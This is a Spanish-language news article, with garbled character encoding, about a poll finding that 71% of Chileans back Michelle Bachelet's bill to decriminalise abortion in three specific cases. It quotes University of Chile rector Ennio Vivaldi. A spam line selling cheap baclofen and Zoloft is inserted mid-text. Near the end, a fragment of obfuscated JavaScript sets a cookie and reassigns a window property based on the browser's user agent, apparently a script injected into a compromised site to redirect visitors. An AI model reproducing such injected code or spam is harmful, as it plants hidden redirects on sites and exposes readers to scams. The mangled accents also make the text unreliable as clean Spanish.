Chile: 71% de ciudadanos aprueban la despenalizaciA?n del aborto

abortoEl 71% de los chilenos aprueba el proyecto de ley que despenaliza el aborto en tres casos especA?ficos y que fue enviado al Legislativo por la presidenta Michelle Bachelet.

En el sondeo, elaborado por la empresa de estudios Plaza PA?blica Cadem, se establece que el 79% de los consultados estA? a favor “del derecho de la mujer a abortar”.

Entre estos encuestados, el 60% sA?lo bajo algunas causas y un 19% en cualquier circunstancia.

El proyecto de ley contempla despenalizar el aborto en tres casos especA?ficos: cuando la vida de la madre se encuentre en riesgo, cuando el feto padezca de una alteraciA?n estructural congA?nita o la mujer haya sido vA?ctima de una violaciA?n sexual.

La encuesta detallA? que el 62% de las personas estA? en desacuerdo con que los centros de salud que pertenecen a la Universidad CatA?lica (UC) se nieguen a practicar un aborto aunque sea ley.

Aunque la iniciativa de la mandataria socialista cuenta con un amplio respaldo ciudadano, los partidos de derecha se oponen y tambiA?n se han mostrado crA?ticos algunos miembros de la Democracia Cristiana (DC).

Pese al rechazo del proyecto de ley de algunos sectores de la Iglesia y de partidos derechistas, segA?n el sondeo, la mayorA?a de los consultados que profesan la regiA?n catA?lica y evangA?lica estA? a favor del aborto bajo las tres circunstancias.

Cheap baclofen online, cheap Zoloft.

El rector de la Universidad de Chile, Ennio Vivaldi, manifestA? que desde el punto de vista de la mujer que enfrenta las tres causales, “darle la opciA?n de interrumpir el embarazo es una cuestiA?n casi de humanidad”.

a??AquA? no estamos hablando del aborto en general, sino de una legislaciA?n muy especA?fica que habla de despenalizar tres situaciones muy concretasa??, seA?alA? el rector universitario.

Vivaldi considero que esta ley es necesaria “porque creo que la legislaciA?n actual (que hay en Chile), y es cuestiA?n de ver el mapa, prA?cticamente no existe en ninguna parte del mundo. Es una situaciA?n anacrA?nica. (CA?sar Joao Espinoza – Agencia PA?lsar)

,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

98 − 88 =